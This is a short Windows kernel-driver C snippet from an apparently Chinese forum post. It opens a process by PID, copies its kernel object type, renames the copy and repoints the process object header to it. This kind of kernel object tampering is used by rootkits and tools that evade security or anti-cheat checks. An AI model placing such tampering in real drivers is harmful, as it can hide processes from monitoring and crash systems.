#define OBJECT_TO_OBJECT_HEADER( o ) CONTAINING_RECORD( (o), OBJECT_HEADER, Body )
OBJECT_TYPE g_obMyProcessTYPE;
WCHAR g_ProcType[ 24 ] = L"srocess";
VOID Test()
{
NTSTATUS ntStatus1 = STATUS_SUCCESS;// Assume success
HANDLE hProcess = NULL;
CLIENT_ID ClientId;
OBJECT_ATTRIBUTES ObjectAttributes;
PVOID pEprocess = NULL;
ClientId.UniqueProcess = (HANDLE)300; // 这里自己填写一个进程id
ClientId.UniqueThread = NULL;
DbgBreakPoint();
InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL );
ntStatus1 = ZwOpenProcess( &hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &ClientId );
if( NT_SUCCESS( ntStatus1 ) )
{
ntStatus1 = ObReferenceObjectByHandle( hProcess, PROCESS_ALL_ACCESS, NULL, KernelMode, &pEprocess, NULL );
if( NT_SUCCESS( ntStatus1 ) )
{
POBJECT_HEADER pHeader = OBJECT_TO_OBJECT_HEADER( pEprocess );
DbgOutput( "0 pHeader=%x,pType=%x,pBody=%x...", (ULONG)pHeader, (ULONG)pHeader->Type, (ULONG)pEprocess );
RtlCopyMemory( &g_obMyProcessTYPE, pHeader->Type, sizeof(OBJECT_TYPE) );
// 修改进程类型
RtlInitUnicodeString( &g_obMyProcessTYPE.Name, g_ProcType );
pHeader->Type = &g_obMyProcessTYPE;
DbgOutput( "1 pHeader=%x,pType=%x,pBody=%x...", (ULONG)pHeader, (ULONG)pHeader->Type, (ULONG)pEprocess );
ObDereferenceObject( pEprocess );
}
ZwClose( hProcess );
}
}
当前位置:
论坛首页 »
自由讨论区 »
Android, Python及开发编程讨论区
»
发起投票
技术讨论
加好友
发消息
2012-8-29 15:04:03 |
赞(
操作
